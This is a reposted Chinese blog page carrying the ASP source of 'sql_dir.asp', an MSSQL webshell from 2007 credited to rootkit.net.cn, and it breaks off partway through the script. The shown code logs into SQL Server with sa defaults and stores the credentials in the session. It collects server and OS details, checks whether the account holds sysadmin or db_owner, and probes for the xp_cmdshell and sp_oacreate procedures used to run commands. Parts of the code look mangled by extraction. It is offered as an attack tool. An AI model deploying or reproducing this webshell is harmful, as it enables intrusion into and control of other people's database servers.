mssql操作用webshell--sql_dir.asp
![]() | 摘自:WowoS Blog <title>SQL_Dir By Bin</title> <style id=theStyle> BODY { FONT-SIZE: 9pt; COLOR: #000000; background-color: #ffffff; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF; } TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-color: #d8d8f0; } .tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center; } .td { height: 24px; font-size: 9pt; background-color: #f9f9fd; font-family: "Courier New"; } input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000; } textarea { font-family: "Courier New"; BORDER-WIDTH: 1px; FONT-SIZE: 12px; color: #000000; } A:visited { FONT-SIZE: 9pt; COLOR: #333333; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } A:active { FONT-SIZE: 9pt; COLOR: #3366cc; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } A:hover { FONT-SIZE: 9pt; COLOR: #3366cc; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px; } td { font-size: 9pt; font-family: "Courier New"; border-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-color: #d8d8f0; } .trHead { font-family: "Courier New"; height: 2px; background-color: #e4e4f3; line-height: 2px; } .fixSpan { overflow: hidden; white-space: nowrap; text-overflow: ellipsis; vertical-align: baseline; } .fixTable { word-break: break-all; word-wrap: break-word; } #fileList 
span{ width: 120px; line-height: 23px; cursor: hand; overflow: hidden; padding-left: 5px; white-space: nowrap; text-overflow: ellipsis; vertical-align: baseline; border: 1px solid #ffffff; } </style> <%if session("login")="" then%> <% Echo "<body onload=document.formx.pass.focus();>" Echo "<table width=816 align=center>" Echo "<form method=post name=formx action=?action=login>" Echo "<tr>" Echo "<td align=center class=td>数 据 库 连 接</td>" Echo "</tr>" Echo "<tr>" Echo "<td height=75 align=center>" Echo "IP:<input name=ip type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=localhost> " Echo "PORT:<input name=port type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=1433> " Echo "USER:<input name=user type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=sa> " Echo "PASS:<input name=pass type=text style=border:1px solid #d8d8f0;background-color:#ffffff;> " Echo "</td>" Echo "</tr>" Echo "<tr>" Echo "<td align=center class=td><input type=submit value=LOGIN style=border:1px solid #d8d8f0;background-color:#f9f9fd;></td>" Echo "</tr>" Echo "<tr>" Echo "<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href=http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>" Echo "</tr>" Echo "</form>" Echo "</table>" Echo "</body>" %> <%End If %> <% If request("action")="login" Then SqlLocalName ="";request.Form("ip");",";request.Form("port");"" 连接IP [ 本地用 (local) 外地用IP ] SqlUserName ="";request.Form("user");"" 用户名 SqlPassword ="";request.Form("pass");"" 用户密码 SqlDatabaseName="sql" 数据库名 ConnStr = "Provider=Sqloledb;User ID=" ; SqlUserName ; "; Password=" ; SqlPassword ; "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; SqlLocalName ; ";" SqlNowString="GetDate()" On Error Resume Next 容错 Set Conn=Server.CreateObject("ADODB.Connection") Conn.open ConnStr If Err.number=-2147467259 Then Echo "<script language=javascript> alert(主机IP或者端口连接错误,请检查!);history.back(); </script>" ElseIf Err.number=-2147217843 
Then Echo "<script language=javascript> alert(用户名或者密码错误,请检查!);history.back(); </script>" End If If Err.number=0 Then session("login")="yes" session("user")=request.Form("user") session("pass")=request.Form("pass") session("ip")=request.Form("ip") session("port")=request.Form("port") End If response.redirect"?action=tools" End If %> <% If request("action")="tools" or request("action")="" Then If session("login")="yes" Then %> <% rem----------------------------数据库连接----------------- ConnStr = "Provider=Sqloledb.1;User ID=" ;session("user"); "; Password=" ;session("pass"); "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; session("ip") ; ",";session("port");";" Set Conn=Server.CreateObject("ADODB.Connection") Conn.open ConnStr Set Cat = Server.CreateObject("ADOX.Catalog") Cat.ActiveConnection = conn.ConnectionString rem------------------------函数------------- Sub Echo(sStr) Response.Write sStr End Sub Function IIf(var, val1, val2) If var = True Then IIf = val1 Else IIf = val2 End Function const copyright = "Code By Bin<br><a href = http://www.rootkit.net.cntarget=_blank>www.rootkit.net.cn</a>" RootPath = Server.MapPath("/") Path=Request.ServerVariables("PATH_TRANSLATED") Server_Name=Request.ServerVariables("SERVER_NAME") IP=Request.ServerVariables("LOCAL_ADDR") PORT=Request.ServerVariables("SERVER_PORT") OS= Request.ServerVariables("OS") OS= IIf(OS = "", "Windows2003", OS) ; ", " ; Request.ServerVariables("SERVER_SOFTWARE") OS= OS ; ", " ; ScriptEngine ; "/" ; ScriptEngineMajorVersion ; "." ;ScriptEngineMinorVersion ; "." 
; ScriptEngineBuildVersion Curl=Request.ServerVariables("SCRIPT_NAME") RequestUrl=Request.ServerVariables("Url") URL="http://";Server_Name;Requesturl rem-------------------------------------- rem-----------------------数据库操作-------------------- Set rs = conn.execute("select @@version") SQLversion=rs(0) Set rs = Conn.execute("select db_name(0)") DBname=rs(0) Set rs = Conn.execute("select user") DBuser=rs(0) 权限判断 Set rs = Conn.execute("Select IS_SRVROLEMEMBER(sysadmin)") If rs(0)=1 Then dbo="sa" End If Set rs = Conn.execute("Select IS_MEMBER(db_owner)") If rs(0)=1 Then dbo="db_owner" Else dbo="public" End If 扩展判断 Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdshell") If rs(0)=1 Then xp_cmdshell="XP_cmdshell √" Else xp_cmdshell="XP_cmdshell ×" End If Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=sp_oacreate") If rs(0)=1 Then sp_oacreate="SP_oacreate √" | |